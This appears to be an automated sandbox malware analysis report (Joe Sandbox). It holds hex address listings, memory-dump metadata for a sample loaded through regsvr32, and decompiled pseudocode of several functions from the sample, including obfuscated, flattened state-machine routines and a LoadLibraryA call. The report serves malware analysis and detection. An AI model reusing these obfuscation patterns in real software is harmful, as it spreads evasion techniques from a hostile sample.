                                                                                                                0x001a74c4
                                                                                                                0x001a74cc
                                                                                                                0x001a74d4
                                                                                                                0x001a74dc
                                                                                                                0x001a74e4
                                                                                                                0x001a74e9
                                                                                                                0x001a74f1
                                                                                                                0x001a74f9
                                                                                                                0x001a7501
                                                                                                                0x001a7506
                                                                                                                0x001a750e
                                                                                                                0x001a7516
                                                                                                                0x001a751e
                                                                                                                0x001a7523
                                                                                                                0x001a752b
                                                                                                                0x001a7533
                                                                                                                0x001a753b
                                                                                                                0x001a7547
                                                                                                                0x001a754a
                                                                                                                0x001a754e
                                                                                                                0x001a7556
                                                                                                                0x001a755e
                                                                                                                0x001a7566
                                                                                                                0x001a756e
                                                                                                                0x001a7576
                                                                                                                0x001a757e
                                                                                                                0x001a7586
                                                                                                                0x001a758e
                                                                                                                0x001a7596
                                                                                                                0x001a759e
                                                                                                                0x001a75a6
                                                                                                                0x001a75aa
                                                                                                                0x001a75b2
                                                                                                                0x001a75bf
                                                                                                                0x001a75cc
                                                                                                                0x001a75d4
                                                                                                                0x001a75dc
                                                                                                                0x001a75e4
                                                                                                                0x001a75ec
                                                                                                                0x001a75f4
                                                                                                                0x001a75f4
                                                                                                                0x001a75fa
                                                                                                                0x001a7626
                                                                                                                0x001a7638
                                                                                                                0x001a763d
                                                                                                                0x001a7640
                                                                                                                0x001a7642
                                                                                                                0x001a7648
                                                                                                                0x00000000
                                                                                                                0x001a7648
                                                                                                                0x001a75fc
                                                                                                                0x001a7602
                                                                                                                0x001a774e
                                                                                                                0x001a7608
                                                                                                                0x001a760e
                                                                                                                0x00000000
                                                                                                                0x001a7614
                                                                                                                0x001a7614
                                                                                                                0x00000000
                                                                                                                0x001a7614
                                                                                                                0x001a760e
                                                                                                                0x001a7602
                                                                                                                0x001a7755
                                                                                                                0x001a7760
                                                                                                                0x001a7760
                                                                                                                0x001a7665
                                                                                                                0x001a766a
                                                                                                                0x001a766e
                                                                                                                0x001a7679
                                                                                                                0x001a767e
                                                                                                                0x001a7689
                                                                                                                0x001a7695
                                                                                                                0x001a76c6
                                                                                                                0x001a7706
                                                                                                                0x001a7724
                                                                                                                0x001a7729
                                                                                                                0x001a772c
                                                                                                                0x001a7731
                                                                                                                0x001a7731
                                                                                                                0x001a7731
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BrR$D$IXNr$UDb$]l$o@$9
                                                                                                                • API String ID: 0-356127896
                                                                                                                • Opcode ID: 0aaa061ee81c2b6729ee47dda7435df833cfd2b01a9e716eb2d97dda09cd1f7f
                                                                                                                • Instruction ID: 99342eb500158b5d4bc910bf1a1b4c823ee3c135a57e077ebfeb4fdf37e598dc
                                                                                                                • Opcode Fuzzy Hash: 0aaa061ee81c2b6729ee47dda7435df833cfd2b01a9e716eb2d97dda09cd1f7f
                                                                                                                • Instruction Fuzzy Hash: 50D110720093809FD3A4CF61C88AA5FFBE1FB95754F10891CF29A96260C7B58959CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BE168 Relevance: 9.0, Strings: 7, Instructions: 235COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001BE168(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				void* _t222;
				void* _t224;
				signed int _t239;
				signed int _t242;
				intOrPtr* _t243;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				void* _t272;
				signed int _t275;
				signed int* _t276;

				_t243 = __ecx;
				_t276 =  &_v232;
				_v156 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0xee8771;
				_v192 = 0x117fd;
				_v192 = _v192 | 0x1d6a2708;
				_v192 = _v192 ^ 0x1d606f88;
				_v152 = 0xf4b7c1;
				_v152 = _v152 << 5;
				_v152 = _v152 ^ 0x1e95570e;
				_v144 = 0xfe12e3;
				_v144 = _v144 | 0x54cbb312;
				_v144 = _v144 ^ 0x54f6fa6e;
				_v208 = 0x534ee7;
				_v208 = _v208 >> 6;
				_t267 = 0x35;
				_v208 = _v208 / _t267;
				_v208 = _v208 + 0xffff6f6b;
				_t272 = 0x83f99c0;
				_v208 = _v208 ^ 0xfff14d46;
				_v172 = 0xc94499;
				_v172 = _v172 + 0x11d2;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x000f0cb6;
				_v228 = 0x751ae;
				_t268 = 0x2e;
				_v228 = _v228 / _t268;
				_v228 = _v228 + 0xffffae70;
				_v228 = _v228 | 0xa36e753b;
				_v228 = _v228 ^ 0xfff46ae6;
				_v176 = 0x1a7255;
				_v176 = _v176 << 4;
				_v176 = _v176 + 0xffff0783;
				_v176 = _v176 ^ 0x01a682c2;
				_v164 = 0xe36d6f;
				_v164 = _v164 ^ 0xb397a4d2;
				_v164 = _v164 ^ 0xb37dbef8;
				_v212 = 0xf88382;
				_v212 = _v212 ^ 0x1a92608a;
				_v212 = _v212 + 0xffff7ea5;
				_t269 = 0x5e;
				_v212 = _v212 / _t269;
				_v212 = _v212 ^ 0x0041f51b;
				_v168 = 0x2ed612;
				_v168 = _v168 ^ 0x7e3753ae;
				_v168 = _v168 ^ 0x7e1e684c;
				_v224 = 0xc32fee;
				_v224 = _v224 ^ 0x529128d1;
				_v224 = _v224 << 3;
				_v224 = _v224 ^ 0x1753897f;
				_v224 = _v224 ^ 0x85c8b1aa;
				_v148 = 0xc50457;
				_v148 = _v148 + 0x7d80;
				_v148 = _v148 ^ 0x00cb96db;
				_v160 = 0x145c88;
				_v160 = _v160 >> 0xf;
				_v160 = _v160 ^ 0x000af213;
				_v140 = 0x224ded;
				_v140 = _v140 + 0x4843;
				_v140 = _v140 ^ 0x0020cf31;
				_v216 = 0x41dfd5;
				_v216 = _v216 + 0xffff4a02;
				_v216 = _v216 | 0xaf3fa73f;
				_v216 = _v216 ^ 0xaf7fe239;
				_v196 = 0x952dc;
				_v196 = _v196 << 0xf;
				_v196 = _v196 ^ 0x69ad3ccd;
				_v196 = _v196 ^ 0xc0c4200a;
				_v184 = 0x7c7b83;
				_v184 = _v184 << 4;
				_v184 = _v184 << 9;
				_v184 = _v184 ^ 0x8f72bfe3;
				_v220 = 0x982520;
				_v220 = _v220 + 0xffff0e3e;
				_v220 = _v220 ^ 0x8960c3b3;
				_v220 = _v220 ^ 0xa2afcaef;
				_v220 = _v220 ^ 0x2b5f563a;
				_v232 = 0xe8ca7a;
				_t270 = 0x7e;
				_v232 = _v232 / _t270;
				_v232 = _v232 | 0xf34d851f;
				_v232 = _v232 ^ 0x94a10a03;
				_v232 = _v232 ^ 0x67e9f08a;
				_v180 = 0x10d3c5;
				_v180 = _v180 + 0xfffff1c0;
				_v180 = _v180 ^ 0x411976c6;
				_v180 = _v180 ^ 0x410a8cec;
				_v188 = 0xeb6b7a;
				_v188 = _v188 >> 7;
				_v188 = _v188 + 0x2cfe;
				_v188 = _v188 ^ 0x000f3824;
				_v204 = 0x31cedb;
				_v204 = _v204 << 9;
				_v204 = _v204 + 0xae1;
				_v204 = _v204 * 0x7d;
				_v204 = _v204 ^ 0xa403ef67;
				_v200 = 0xbf2f36;
				_v200 = _v200 + 0x3628;
				_v200 = _v200 ^ 0x00b9258e;
				_t271 = _v200;
				_t275 = _v200;
				_t242 = _v200;
				while(1) {
					L1:
					_t222 = 0xc1521a1;
					do {
						while(_t272 != 0x30d24b1) {
							if(_t272 == 0x83f99c0) {
								_t272 = 0xc42f0e7;
								continue;
							} else {
								if(_t272 == _t222) {
									_push(_v184);
									_push(0x1a1760);
									_push(_v196);
									_t224 = E001BF5D9(_v140, _v216, __eflags);
									_t276 =  &(_t276[3]);
									_push(_t271);
									_push( &_v128);
									_push(_t224);
									_push(_t275);
									_push(_t242);
									 *((intOrPtr*)(E001AADB7(_v140, 0x9f864bbe, 0x270)))();
									E001BF94B(_t224, _v220, _v232, _v180, _v188);
									_t272 = 0xe10e475;
									goto L12;
								} else {
									if(_t272 == 0xc42f0e7) {
										_push(0x10);
										_t275 = E001B96D4(_t243, 1);
										E001A8744(_v208, _v172, 0xb, _v228, _t275,  &_v128, _v176);
										_t272 = 0x30d24b1;
										L12:
										_t276 =  &(_t276[8]);
										L13:
										_t243 = _v156;
										goto L1;
									} else {
										if(_t272 == 0xc83c513) {
											_t275 = 0x4000;
											_push(_t243);
											_t239 = E001A303A(_t243, 0x4000);
											_t243 = _v156;
											_t242 = _t239;
											_t276 =  &(_t276[3]);
											__eflags = _t242;
											_t222 = 0xc1521a1;
											_t272 =  !=  ? 0xc1521a1 : 0xe10e475;
											continue;
										} else {
											if(_t272 != 0xe10e475) {
												goto L19;
											} else {
												E001B17D2(_v204, _v200, _t271);
											}
										}
									}
								}
							}
							L9:
							return _t242;
						}
						_t271 = E001B7E3D( *((intOrPtr*)(_t243 + 4)), _v164,  *_t243, _v212);
						__eflags = _t271;
						if(__eflags == 0) {
							_t243 = _v156;
							_t272 = 0xe91fc15;
							_t222 = 0xc1521a1;
							goto L19;
						} else {
							_t272 = 0xc83c513;
							goto L13;
						}
						goto L9;
						L19:
						__eflags = _t272 - 0xe91fc15;
					} while (__eflags != 0);
					goto L9;
				}
			}











































                                                                                                                0x001be168
                                                                                                                0x001be168
                                                                                                                0x001be172
                                                                                                                0x001be176
                                                                                                                0x001be17d
                                                                                                                0x001be185
                                                                                                                0x001be195
                                                                                                                0x001be19d
                                                                                                                0x001be1a5
                                                                                                                0x001be1ad
                                                                                                                0x001be1b2
                                                                                                                0x001be1ba
                                                                                                                0x001be1c2
                                                                                                                0x001be1ca
                                                                                                                0x001be1d2
                                                                                                                0x001be1da
                                                                                                                0x001be1e5
                                                                                                                0x001be1ea
                                                                                                                0x001be1f0
                                                                                                                0x001be1f8
                                                                                                                0x001be1fd
                                                                                                                0x001be205
                                                                                                                0x001be20d
                                                                                                                0x001be215
                                                                                                                0x001be21a
                                                                                                                0x001be222
                                                                                                                0x001be22e
                                                                                                                0x001be233
                                                                                                                0x001be239
                                                                                                                0x001be241
                                                                                                                0x001be249
                                                                                                                0x001be251
                                                                                                                0x001be259
                                                                                                                0x001be25e
                                                                                                                0x001be266
                                                                                                                0x001be26e
                                                                                                                0x001be276
                                                                                                                0x001be27e
                                                                                                                0x001be286
                                                                                                                0x001be28e
                                                                                                                0x001be296
                                                                                                                0x001be2a2
                                                                                                                0x001be2a5
                                                                                                                0x001be2a9
                                                                                                                0x001be2b1
                                                                                                                0x001be2b9
                                                                                                                0x001be2c1
                                                                                                                0x001be2c9
                                                                                                                0x001be2d1
                                                                                                                0x001be2d9
                                                                                                                0x001be2de
                                                                                                                0x001be2e6
                                                                                                                0x001be2ee
                                                                                                                0x001be2f6
                                                                                                                0x001be2fe
                                                                                                                0x001be306
                                                                                                                0x001be30e
                                                                                                                0x001be313
                                                                                                                0x001be31b
                                                                                                                0x001be323
                                                                                                                0x001be32b
                                                                                                                0x001be333
                                                                                                                0x001be33b
                                                                                                                0x001be343
                                                                                                                0x001be34b
                                                                                                                0x001be353
                                                                                                                0x001be35d
                                                                                                                0x001be362
                                                                                                                0x001be36a
                                                                                                                0x001be372
                                                                                                                0x001be37a
                                                                                                                0x001be37f
                                                                                                                0x001be384
                                                                                                                0x001be38c
                                                                                                                0x001be394
                                                                                                                0x001be39c
                                                                                                                0x001be3a4
                                                                                                                0x001be3ac
                                                                                                                0x001be3b4
                                                                                                                0x001be3c2
                                                                                                                0x001be3c5
                                                                                                                0x001be3c9
                                                                                                                0x001be3d1
                                                                                                                0x001be3d9
                                                                                                                0x001be3e1
                                                                                                                0x001be3e9
                                                                                                                0x001be3f1
                                                                                                                0x001be3f9
                                                                                                                0x001be401
                                                                                                                0x001be409
                                                                                                                0x001be40e
                                                                                                                0x001be416
                                                                                                                0x001be41e
                                                                                                                0x001be426
                                                                                                                0x001be42b
                                                                                                                0x001be438
                                                                                                                0x001be43c
                                                                                                                0x001be444
                                                                                                                0x001be44c
                                                                                                                0x001be454
                                                                                                                0x001be45c
                                                                                                                0x001be460
                                                                                                                0x001be464
                                                                                                                0x001be468
                                                                                                                0x001be468
                                                                                                                0x001be468
                                                                                                                0x001be46d
                                                                                                                0x001be46d
                                                                                                                0x001be47f
                                                                                                                0x001be5a0
                                                                                                                0x00000000
                                                                                                                0x001be485
                                                                                                                0x001be487
                                                                                                                0x001be548
                                                                                                                0x001be54c
                                                                                                                0x001be551
                                                                                                                0x001be55d
                                                                                                                0x001be562
                                                                                                                0x001be570
                                                                                                                0x001be571
                                                                                                                0x001be572
                                                                                                                0x001be573
                                                                                                                0x001be574
                                                                                                                0x001be580
                                                                                                                0x001be594
                                                                                                                0x001be599
                                                                                                                0x00000000
                                                                                                                0x001be48d
                                                                                                                0x001be493
                                                                                                                0x001be50b
                                                                                                                0x001be519
                                                                                                                0x001be532
                                                                                                                0x001be537
                                                                                                                0x001be53c
                                                                                                                0x001be53c
                                                                                                                0x001be53f
                                                                                                                0x001be53f
                                                                                                                0x00000000
                                                                                                                0x001be495
                                                                                                                0x001be49b
                                                                                                                0x001be4c9
                                                                                                                0x001be4da
                                                                                                                0x001be4dd
                                                                                                                0x001be4e2
                                                                                                                0x001be4e6
                                                                                                                0x001be4e8
                                                                                                                0x001be4f0
                                                                                                                0x001be4f2
                                                                                                                0x001be4f7
                                                                                                                0x00000000
                                                                                                                0x001be49d
                                                                                                                0x001be4a3
                                                                                                                0x00000000
                                                                                                                0x001be4a9
                                                                                                                0x001be4b2
                                                                                                                0x001be4b7
                                                                                                                0x001be4a3
                                                                                                                0x001be49b
                                                                                                                0x001be493
                                                                                                                0x001be487
                                                                                                                0x001be4bb
                                                                                                                0x001be4c4
                                                                                                                0x001be4c4
                                                                                                                0x001be5bc
                                                                                                                0x001be5c0
                                                                                                                0x001be5c2
                                                                                                                0x001be5ce
                                                                                                                0x001be5d2
                                                                                                                0x001be5d7
                                                                                                                0x00000000
                                                                                                                0x001be5c4
                                                                                                                0x001be5c4
                                                                                                                0x00000000
                                                                                                                0x001be5c4
                                                                                                                0x00000000
                                                                                                                0x001be5dc
                                                                                                                0x001be5dc
                                                                                                                0x001be5dc
                                                                                                                0x00000000
                                                                                                                0x001be5e8

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (6$:V_+$CH$om$zk$M"$NS
                                                                                                                • API String ID: 0-135718759
                                                                                                                • Opcode ID: d98bbbc0968ecb03d0c0e54a2862376fa3d374a2662858f4db8f37b55471c0e2
                                                                                                                • Instruction ID: 8ac16dfd64102d11d0350c61ad4953e039af238087e1afa926df508a9025be2e
                                                                                                                • Opcode Fuzzy Hash: d98bbbc0968ecb03d0c0e54a2862376fa3d374a2662858f4db8f37b55471c0e2
                                                                                                                • Instruction Fuzzy Hash: 16B163725083809FD368CF61C48984BFBE1FBD4358F508A1DF5A696260D7B5C94ACF86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AC151 Relevance: 8.9, Strings: 7, Instructions: 195COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001AC151(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t194;
				intOrPtr _t195;
				intOrPtr _t199;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				void* _t227;
				void* _t228;
				signed int* _t231;
				signed int* _t232;

				_t231 =  &_v76;
				_v36 = 0x8ff207;
				_v36 = _v36 | 0x5faff7e6;
				_v36 = _v36 ^ 0x5fad7a1e;
				_v40 = 0x724753;
				_v40 = _v40 >> 9;
				_v40 = _v40 * 0x64;
				_t227 = __edx;
				_v40 = _v40 ^ 0x0015a104;
				_v24 = 0x4bab46;
				_t200 = __ecx;
				_v24 = _v24 | 0x1433a485;
				_t228 = 0x6ac6f9c;
				_v24 = _v24 ^ 0x1475d613;
				_v64 = 0x792d6f;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x20efa489;
				_t202 = 0x78;
				_v64 = _v64 / _t202;
				_v64 = _v64 ^ 0x00471cc7;
				_v60 = 0xc13044;
				_v60 = _v60 >> 6;
				_v60 = _v60 << 6;
				_v60 = _v60 + 0xffff33ed;
				_v60 = _v60 ^ 0x00c7cab3;
				_v20 = 0x4e66dd;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x1399b6d5;
				_v52 = 0x1d7f55;
				_t203 = 0x49;
				_v52 = _v52 / _t203;
				_t204 = 0x6b;
				_v52 = _v52 / _t204;
				_v52 = _v52 * 0x74;
				_v52 = _v52 ^ 0x000aaa88;
				_v32 = 0x4f41e6;
				_v32 = _v32 + 0x58b2;
				_v32 = _v32 + 0x6273;
				_v32 = _v32 ^ 0x004c48d8;
				_v56 = 0xc9fe5a;
				_v56 = _v56 * 0x49;
				_v56 = _v56 + 0xffffbb94;
				_v56 = _v56 | 0x07a81756;
				_v56 = _v56 ^ 0x3fbdf189;
				_v68 = 0x194af6;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x4c9b1680;
				_v68 = _v68 ^ 0x2620a115;
				_v68 = _v68 ^ 0x6ab08ab7;
				_v44 = 0x1d64ff;
				_v44 = _v44 | 0xbf79d3da;
				_v44 = _v44 ^ 0xbf7734fb;
				_v72 = 0x175686;
				_v72 = _v72 + 0xbfd6;
				_v72 = _v72 ^ 0x0e6cc914;
				_v72 = _v72 ^ 0x3e6d5307;
				_v72 = _v72 ^ 0x30179962;
				_v76 = 0x87de1c;
				_v76 = _v76 << 1;
				_v76 = _v76 + 0x933;
				_v76 = _v76 | 0x31435ae5;
				_v76 = _v76 ^ 0x314ea78d;
				_v8 = 0x8e8dd9;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000a07dd;
				_v12 = 0xb8b805;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x0003cc3f;
				_v28 = 0x781e68;
				_v28 = _v28 << 0xf;
				_t205 = 0x4d;
				_v28 = _v28 / _t205;
				_v28 = _v28 ^ 0x003d4a7e;
				_v16 = 0x5f2d35;
				_t132 =  &_v16; // 0x5f2d35
				_t206 = 0x14;
				_v16 =  *_t132 / _t206;
				_v16 = _v16 ^ 0x0000f2f8;
				_v4 = 0x4b5f87;
				_v4 = _v4 * 0x13;
				_v4 = _v4 ^ 0x0595d5d6;
				_v48 = 0xb975f8;
				_v48 = _v48 | 0x33424d0e;
				_v48 = _v48 * 0x3f;
				_v48 = _v48 << 8;
				_v48 = _v48 ^ 0xe409ad5d;
				while(1) {
					L1:
					_t194 = 0x2905f39;
					do {
						while(_t228 != _t194) {
							if(_t228 == 0x6ac6f9c) {
								_t228 = 0x6fd6f86;
								continue;
							} else {
								if(_t228 == 0x6fd6f86) {
									_push(_v64);
									_t195 = E001B3E89(_v36, _v40, __eflags, _v24, _t206, _t200);
									_t232 =  &(_t231[4]);
									 *((intOrPtr*)(_t227 + 0x14)) = _t195;
									__eflags = _t195;
									if(_t195 != 0) {
										E001B9954(_t195, _t195, _v60, _v20);
										_push( *((intOrPtr*)(_t227 + 0x14)));
										_push(_v56);
										_t206 = _v52;
										E001A7013(_v52, _v32);
										_t231 =  &(_t232[4]);
										_t228 = 0xe0809d9;
										goto L1;
									}
								} else {
									if(_t228 == 0xabeb3a7) {
										return E001C1BE6(_v4,  *((intOrPtr*)(_t227 + 0x14)), _v48);
									}
									if(_t228 != 0xe0809d9) {
										goto L13;
									} else {
										_t206 = _v68;
										_t199 = E001B6028(_v68, _v44, _v72, _v76,  *((intOrPtr*)(_t227 + 0x14)));
										_t231 =  &(_t231[3]);
										 *((intOrPtr*)(_t227 + 0xc)) = _t199;
										_t194 = 0x2905f39;
										_t228 =  !=  ? 0x2905f39 : 0xabeb3a7;
										continue;
									}
									L17:
								}
							}
							L16:
							return _t195;
							goto L17;
						}
						_t195 = E001B0231(_t227, _v8, _t227, E001B6E1B, _t227, _t206, _v12, _v28, _v16);
						_t231 =  &(_t231[8]);
						 *((intOrPtr*)(_t227 + 4)) = _t195;
						__eflags = _t195;
						if(_t195 == 0) {
							_t228 = 0xabeb3a7;
							_t194 = 0x2905f39;
							goto L13;
						}
						goto L16;
						L13:
						__eflags = _t228 - 0x5387d9c;
					} while (__eflags != 0);
					return _t194;
				}
			}


































                                                                                                                0x001ac151
                                                                                                                0x001ac154
                                                                                                                0x001ac15c
                                                                                                                0x001ac164
                                                                                                                0x001ac16c
                                                                                                                0x001ac174
                                                                                                                0x001ac182
                                                                                                                0x001ac186
                                                                                                                0x001ac188
                                                                                                                0x001ac192
                                                                                                                0x001ac19a
                                                                                                                0x001ac19c
                                                                                                                0x001ac1a4
                                                                                                                0x001ac1a9
                                                                                                                0x001ac1b1
                                                                                                                0x001ac1b9
                                                                                                                0x001ac1be
                                                                                                                0x001ac1cc
                                                                                                                0x001ac1d1
                                                                                                                0x001ac1d7
                                                                                                                0x001ac1df
                                                                                                                0x001ac1e7
                                                                                                                0x001ac1ec
                                                                                                                0x001ac1f1
                                                                                                                0x001ac1f9
                                                                                                                0x001ac201
                                                                                                                0x001ac209
                                                                                                                0x001ac20e
                                                                                                                0x001ac216
                                                                                                                0x001ac222
                                                                                                                0x001ac227
                                                                                                                0x001ac231
                                                                                                                0x001ac234
                                                                                                                0x001ac23d
                                                                                                                0x001ac241
                                                                                                                0x001ac249
                                                                                                                0x001ac251
                                                                                                                0x001ac259
                                                                                                                0x001ac261
                                                                                                                0x001ac269
                                                                                                                0x001ac276
                                                                                                                0x001ac27a
                                                                                                                0x001ac282
                                                                                                                0x001ac28a
                                                                                                                0x001ac292
                                                                                                                0x001ac29a
                                                                                                                0x001ac29f
                                                                                                                0x001ac2a7
                                                                                                                0x001ac2af
                                                                                                                0x001ac2b7
                                                                                                                0x001ac2bf
                                                                                                                0x001ac2c7
                                                                                                                0x001ac2cf
                                                                                                                0x001ac2d7
                                                                                                                0x001ac2df
                                                                                                                0x001ac2e7
                                                                                                                0x001ac2ef
                                                                                                                0x001ac2f7
                                                                                                                0x001ac2ff
                                                                                                                0x001ac303
                                                                                                                0x001ac30b
                                                                                                                0x001ac313
                                                                                                                0x001ac31b
                                                                                                                0x001ac323
                                                                                                                0x001ac32a
                                                                                                                0x001ac337
                                                                                                                0x001ac33f
                                                                                                                0x001ac344
                                                                                                                0x001ac34c
                                                                                                                0x001ac354
                                                                                                                0x001ac35f
                                                                                                                0x001ac364
                                                                                                                0x001ac36a
                                                                                                                0x001ac372
                                                                                                                0x001ac37a
                                                                                                                0x001ac37e
                                                                                                                0x001ac381
                                                                                                                0x001ac385
                                                                                                                0x001ac38d
                                                                                                                0x001ac39a
                                                                                                                0x001ac39e
                                                                                                                0x001ac3a6
                                                                                                                0x001ac3ae
                                                                                                                0x001ac3bb
                                                                                                                0x001ac3bf
                                                                                                                0x001ac3c4
                                                                                                                0x001ac3cc
                                                                                                                0x001ac3cc
                                                                                                                0x001ac3cc
                                                                                                                0x001ac3d1
                                                                                                                0x001ac3d1
                                                                                                                0x001ac3df
                                                                                                                0x001ac484
                                                                                                                0x00000000
                                                                                                                0x001ac3e5
                                                                                                                0x001ac3eb
                                                                                                                0x001ac42d
                                                                                                                0x001ac43f
                                                                                                                0x001ac444
                                                                                                                0x001ac447
                                                                                                                0x001ac44a
                                                                                                                0x001ac44c
                                                                                                                0x001ac45e
                                                                                                                0x001ac463
                                                                                                                0x001ac466
                                                                                                                0x001ac46e
                                                                                                                0x001ac472
                                                                                                                0x001ac477
                                                                                                                0x001ac47a
                                                                                                                0x00000000
                                                                                                                0x001ac47a
                                                                                                                0x001ac3ed
                                                                                                                0x001ac3ef
                                                                                                                0x00000000
                                                                                                                0x001ac4dc
                                                                                                                0x001ac3fb
                                                                                                                0x00000000
                                                                                                                0x001ac401
                                                                                                                0x001ac410
                                                                                                                0x001ac414
                                                                                                                0x001ac419
                                                                                                                0x001ac41c
                                                                                                                0x001ac423
                                                                                                                0x001ac428
                                                                                                                0x00000000
                                                                                                                0x001ac428
                                                                                                                0x00000000
                                                                                                                0x001ac3fb
                                                                                                                0x001ac3eb
                                                                                                                0x001ac4e4
                                                                                                                0x001ac4e4
                                                                                                                0x00000000
                                                                                                                0x001ac4e4
                                                                                                                0x001ac4a8
                                                                                                                0x001ac4ad
                                                                                                                0x001ac4b0
                                                                                                                0x001ac4b3
                                                                                                                0x001ac4b5
                                                                                                                0x001ac4b7
                                                                                                                0x001ac4b9
                                                                                                                0x00000000
                                                                                                                0x001ac4b9
                                                                                                                0x00000000
                                                                                                                0x001ac4be
                                                                                                                0x001ac4be
                                                                                                                0x001ac4be
                                                                                                                0x00000000
                                                                                                                0x001ac3d1

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 5-_$SGr$o-y$sb$~J=$AO$ZC1
                                                                                                                • API String ID: 0-1344538677
                                                                                                                • Opcode ID: f509f5554e4af19868a0712b6017788f8255f7294a61a6f276d4d2e68dfc5611
                                                                                                                • Instruction ID: a99aa39f10254f6ed4db8913b47128ac6dfd737d5814a6f926070edb9a9d6909
                                                                                                                • Opcode Fuzzy Hash: f509f5554e4af19868a0712b6017788f8255f7294a61a6f276d4d2e68dfc5611
                                                                                                                • Instruction Fuzzy Hash: 799130725083419FC348DF22D58A41BFBE1BBD9708F008A1DF5A9A6260D7B5DA09CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002583F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E1002583F(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t26 = __ebx;
				_t9 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					E1000B0F0(__ebx, __edi, _t35, E1003F11F(__edx,  &_v288, 4, "LOC"));
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E1003D47E(_t39));
					 *(E1003D47E(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E1003D617( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E1003D47E(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E1003D47E(__eflags)) = _t34;
					} else {
						E10017114( *((intOrPtr*)(E1003D47E(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E1003B437(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                                0x1002583f
                                                                                                                0x1002583f
                                                                                                                0x1002583f
